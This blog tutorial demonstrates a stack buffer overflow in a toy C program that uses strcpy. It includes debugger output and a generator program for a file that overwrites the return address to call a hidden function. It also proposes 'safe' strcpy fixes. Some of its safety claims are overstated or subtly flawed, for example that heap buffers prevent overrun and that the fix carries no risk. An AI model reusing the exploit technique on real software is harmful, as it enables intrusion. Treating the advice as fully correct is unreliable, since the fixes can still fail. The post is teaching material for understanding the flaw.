How Dangerous Is strcpy Really?

How Dangerous Is `strcpy` Really?

Published: 5/6/2025

Overview
Bad Use of strcpy
Exploiting a Buffer Overflow
Fixing the Buffer Overflow
But Is It Really Fixed?
Conclusion

Overview

If you have done any amount of programming in C, you will most likely have heard that you shouldn't use functions like strcpy, strcat, sprintf, etc., due to them being unsafe and very easily susceptible to buffer overflow attacks. While true, and fantastic advice for new programmers, like any dangerous tool, in the hands of a trained professional, there isn't much to worry about. When talking about C/C++, people like to bring up how easy it is to shoot yourself in the foot. In this example, functions like strcpy are merely the gun; the programmer is the one that pulls the trigger. Like with firearm safety, if handled and used properly, firearms can't hurt anyone. Just like with functions like strcpy, if used correctly, they can't cause buffer overflows. In this blog post, we take a look at how buffer overflows are exploited when functions like strcpy are used without the proper safety mechanisms, as well as how to properly implement said functions to prevent buffer overflows.

Bad Use of `strcpy`

Let's assume we have a simple C program that takes in a filename as input, reads in that file, and then determines if the contents of that file are a string.

NOTE: The following code to check if an unsigned char array is a string is just for demonstration purposes and has been overly simplified for brevity.

Here is what such a program could look like:


#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char *loadfile(const char *filename, size_t *size)
{
    /* Code to read in a file */
}

int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}

int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;

    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }

    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;

    if (is_uchar_str(data))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);

    free(data);
    return EXIT_SUCCESS;
}

For brevity's sake, I have omitted the code to handle the reading in of the file. However, let us assume that the function is not susceptible to any sort of buffer overflow attack. If you haven't already found the buffer overflow, it's these lines right here:


char tmp[20];
strcpy(tmp, (char *) data);

The reason this can cause a buffer overflow is that we are blindly copying data, which has an unknown size, into a fixed-size buffer. If data happens to be larger than 20 bytes, this will cause a buffer overflow. This is because strcpy does not do any bounds checking to make sure the buffer you are copying into is large enough to hold the incoming data.

However, just because a buffer overflow can occur doesn't mean it will. Let us compile and run our program and see what happens:


$ gcc -g main.c -o main
$ ./main test
Read in 7 bytes from test
String: aaaaaa

Here, we can see we read in a file, test, and it contained six a's plus a new line for a total of seven bytes. Obviously, 7 < 20, so there's no way a buffer overflow could happen with this specific file.

Exploiting a Buffer Overflow

As we discussed in the section above, our example program is vulnerable to a buffer overflow attack.

How It Works

In short, a buffer overflow is what happens when a program writes data to a buffer that goes beyond its allocated space and corrupts surrounding memory. Used maliciously, buffer overflows can be exploited to inject and execute arbitrary code. One of the ways this is done is by overwriting the return address of a function in order to jump to the hacker's injected code and execute it.

The reason buffer overflow attacks are so dangerous is because any code injected by the hacker will run at the permission level of the program itself. This means if a hacker exploits a program running with root (or administrative) privileges, any arbitrary code they execute will also run with those same privileges. So, if a hacker exploits a buffer overflow in a program running as root and injects code to spawn a reverse shell, the hacker now has free reign to do whatever they please on that system.

In Practice

Let's now assume our example program has a secret function that we want to execute that we otherwise can't by using the program normally.


void secret(void)
{
    printf("This should never print\n");
}

If we didn't have the source code to see this function existed, we could still find it by running objdump on our program.


$ objdump -d main
        .
        .
00000000000012a9 :
    12a9:	f3 0f 1e fa          	endbr64 
    12ad:	55                   	push   %rbp
    12ae:	48 89 e5             	mov    %rsp,%rbp
    12b1:	48 8d 05 50 0d 00 00 	lea    0xd50(%rip),%rax        # 2008 <_IO_stdin_used+0x8>
    12b8:	48 89 c7             	mov    %rax,%rdi
    12bb:	e8 60 fe ff ff       	call   1120 
    12c0:	90                   	nop
    12c1:	5d                   	pop    %rbp
    12c2:	c3                   	re
        .
        .

Here, we can see that a function named secret exists within our program but is inaccessible to us. Since we know this program is vulnerable to a buffer overflow, we can exploit that buffer overflow in order to have this program run the secret function.

I have also done a couple of preliminary steps to disable common protections like Address Space Layout Randomization (ASLR), StackGuard, Canary Words, etc. You can still perform buffer overflows without these disabled, but for the sake of simplicity and consistency for this demo, I have disabled them.

Crafting Our Exploit

First, let's run our program through a debugger, like GDB, to get a sense of the memory space and how to craft our exploit.

In GDB, if we run layout src, we can see the function we want to exploit.

GDB output from running layout src showing vulnerable function

So, let's add a breakpoint at line 58, right before our function returns, and look at the current state of the stack.


(gdb) b 58
Breakpoint 1 at 0x1418: file main.c, line 58.
(gdb) r test
Starting program: /home/main test
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Read in 7 bytes from test

Breakpoint 1, is_uchar_str (data=0x55555555a490 "aaaaaa\n") at main.c:58
58	    return isalpha(tmp[0]);
(gdb) x/32x $rsp
0x7fffffffe2f0:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe300:	0x61616161	0x000a6161	0x00000007	0x00000000
0x7fffffffe310:	0x5555a490	0x00005555	0x555592a0	0x00005555
0x7fffffffe320:	0xffffe350	0x00007fff	0x555554b5	0x00005555
0x7fffffffe330:	0xffffe468	0x00007fff	0x00000000	0x00000002
0x7fffffffe340:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe350:	0x00000002	0x00000000	0xf7c29d90	0x00007fff
0x7fffffffe360:	0x00000000	0x00000000	0x5555543b	0x00005555
(gdb)

What we just did was run the program with our test file and dump the current layout of the stack at our breakpoint. On the line starting with 0x7fffffffe300, we can see that those are our a's, since 0x61 is the ASCII encoding for a in hexadecimal. Looking deeper, we can see that the line starting with 0x7fffffffe320 contains our return address. Due to the endianness, or the way in which the bytes are ordered, we have to flip the numbers, but we can see our return address is 0x00005555555554b5. How do we know this? We can confirm this by disassembling our main function in GDB by running disas main. Which gives us this:


        .
        .
0x00005555555554a9 <+110>:	mov    -0x8(%rbp),%rax
0x00005555555554ad <+114>:	mov    %rax,%rdi
0x00005555555554b0 <+117>:	call   0x5555555553f5 
0x00005555555554b5 <+122>:	test   %eax,%eax
0x00005555555554b7 <+124>:	je     0x5555555554d4 
0x00005555555554b9 <+126>:	mov    -0x8(%rbp),%rax
        .
        .

We can see that the function we are currently in, is_uchar_str, is at address 0x00005555555554b0 and the next instruction is at address 0x00005555555554b5. That's how we know from our stack dump that 0x00005555555554b5 was our return address.

All we have to do now is create a malicious file that overwrites that return address with the address of the secret function. To find this, we can run disas secret:


Dump of assembler code for function secret:
    0x00005555555552a9 <+0>:	endbr64 
    0x00005555555552ad <+4>:	push   %rbp
    0x00005555555552ae <+5>:	mov    %rsp,%rbp
    0x00005555555552b1 <+8>:	lea    0xd50(%rip),%rax        # 0x555555556008
    0x00005555555552b8 <+15>:	mov    %rax,%rdi
    0x00005555555552bb <+18>:	call   0x555555555120 
    0x00005555555552c0 <+23>:	nop
    0x00005555555552c1 <+24>:	pop    %rbp
    0x00005555555552c2 <+25>:	ret    
End of assembler dump.

Here, we can see the address of the secret function is 0x00005555555552a9, so that is what we want to put for our return address in order to execute the secret function.

Going back to the stack dump:


(gdb) x/32x $rsp
0x7fffffffe2f0:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe300:	0x61616161	0x000a6161	0x00000007	0x00000000
0x7fffffffe310:	0x5555a490	0x00005555	0x555592a0	0x00005555
0x7fffffffe320:	0xffffe350	0x00007fff	0x555554b5	0x00005555
0x7fffffffe330:	0xffffe468	0x00007fff	0x00000000	0x00000002
0x7fffffffe340:	0x00000000	0x00000000	0x5555a490	0x00005555
0x7fffffffe350:	0x00000002	0x00000000	0xf7c29d90	0x00007fff
0x7fffffffe360:	0x00000000	0x00000000	0x5555543b	0x00005555

We can see that there are 40 bytes between the start of our buffer and the return address. In order to generate our malicious file, I wrote a simple C program to generate it for us:


#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    size_t size = 56; /* Larger than what we realistically need */
    int off = 0x28; /* Offset in the buffer where the return address is */
    char buffer[size];
    FILE *badfile;

    /* Initialize buffer with all 'a' */
    memset(&buffer, 0x61, size);

    /* Return address to overwrite */ 
    *((long *) (buffer + off)) = 0x00005555555552a9;

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, size, 1, badfile);
    fclose(badfile);
}

NOTE: 0x28 in hexadecimal is 40 in decimal (or base 10).

Compiling and running that program, we now have our malicious file that will allow us to exploit the buffer overflow and run the secret function. Let's run it and see what happens.

successful buffer overflow exploit

Bada bing bada boom! Our buffer overflow exploit was a success, and the secret function was executed. In case you're curious, the reason the Illegal instruction (core dumped) message appeared is because we did not properly handle what happens after our exploit happens. Especially in this basic example, where the program would exit anyway, this doesn't really matter. However, for more sophisticated attacks, adding in the proper handling for what happens after the exploit would matter.

Fixing the Buffer Overflow

Now that we have proven we can exploit this program via a buffer overflow, how do we fix it? Sure, you can change the is_uchar_str to use strncpy, as seen here:


/* Old */
int is_uchar_str(unsigned char *data)
{
    char tmp[20];
    strcpy(tmp, (char *) data);
    return isalpha(tmp[0]);
}
/* New */
int is_uchar_str(unsigned char *data)
{
    size_t size = 20;
    char tmp[size + 1];
    strncpy(tmp, (char *) data, size);
    return isalpha(tmp[0]);
}

While that would absolutely fix the problem, the point of this is to show how you can use strcpy and still be safe. The better solution, while still using strcpy, would be to add the size of the incoming data as a parameter. After that, it would be best practice to allocate memory on the heap, rather than creating a fixed-size buffer on the stack. The primary reason for this is that the stack is much more limited in how much memory it can hold compared to the heap. Similarly, if you allocate the memory on the heap, the hacker can't simply overrun your buffer and overwrite the return address, like they can in our example.

With all that in mind, our new function would look something like this:


int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;

    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}

Since we updated our is_uchar_str function by adding an additional parameter, we have to update our main function as well:


int main(int argc, char **argv)
{
    unsigned char *data = NULL;
    size_t size = 0;

    if (argc < 2)
    {
        printf("Usage: %s \n", argv[0]);
        return EXIT_FAILURE;
    }

    data = loadfile(argv[1], &size);
    if (data == NULL)
        return EXIT_FAILURE;

    if (is_uchar_str(data, size))
        printf("String: %s\n", (char *) data);
    else
        printf("%s is binary\n", argv[1]);

    free(data);
    return EXIT_SUCCESS;
}

With these changes, if we recompile the program (even with all the protections disabled), try as we might, we won't be able to perform a buffer overflow:

program executing as expected after removing the buffer overflow

Even running our program through Valgrind, we can see we have no memory leaks or errors.

clean valgrind output

But Is It Really Fixed?

In our example, yes; but globally, no. If our is_uchar_str function was a part of an API or library, it would technically still be vulnerable to a buffer overflow under the right conditions. I.e., the same conditions that make strcpy susceptible to a buffer overflow: negligence on behalf of the developer calling it. Let's look at it again:


int is_uchar_str(unsigned char *data, size_t size)
{
    char *tmp = calloc(size + 1, sizeof(char));
    int ret = 0; /* 0 = false */
    if (tmp == NULL)
        return ret;

    strcpy(tmp, (char *) data);
    ret = isalpha(tmp[0]);
    free(tmp);
    return ret;
}

If the developer fails to provide the adequate size of the data coming in, a buffer overflow can still occur. However, the same holds true if you use strncpy or strncat, for example, just in reverse.

In our case, if the size is too small, we won't allocate enough space, and the buffer will overflow. In the case of strncpy and strncat, if the size you give is larger than the buffer you're copying/concatenating into, you can still have a buffer overflow. Though, granted, the range in which a hacker could overflow the buffer, theoretically, would be more limited.

Conclusion

As we've clearly demonstrated, using functions like strcpy, strcat, sprintf, etc., can be done without any risk of a buffer overflow occurring. However, like we mentioned in the beginning, comparing these functions to firearms, developers must ensure they are taking the requisite steps to ensure their buffers are large enough to receive any incoming data. Which, in fairness, they should be doing anyway. One notable exception to this would be if you're working within a protocol where messages can only be of a certain length. In which case, yes, using strncpy would make more sense. The counterargument to that, though, is that if messages can only be, say, 4096 bytes long, you don't even need to use any form of string copying in the first place. You can just check if the data is less than 4096 bytes prior to performing strcpy, since anything larger is obviously an invalid message and not worth parsing in the first place.

As a final note, whenever you are working in memory-unsafe languages, like C/C++, always ensure you verify your buffers are large enough to receive the data you plan to put in them prior to copying that data into said buffer, regardless of if you are using strcpy or strncpy. If your buffer isn't large enough, either resize it or find another way to handle the exception, for example, like returning an error code.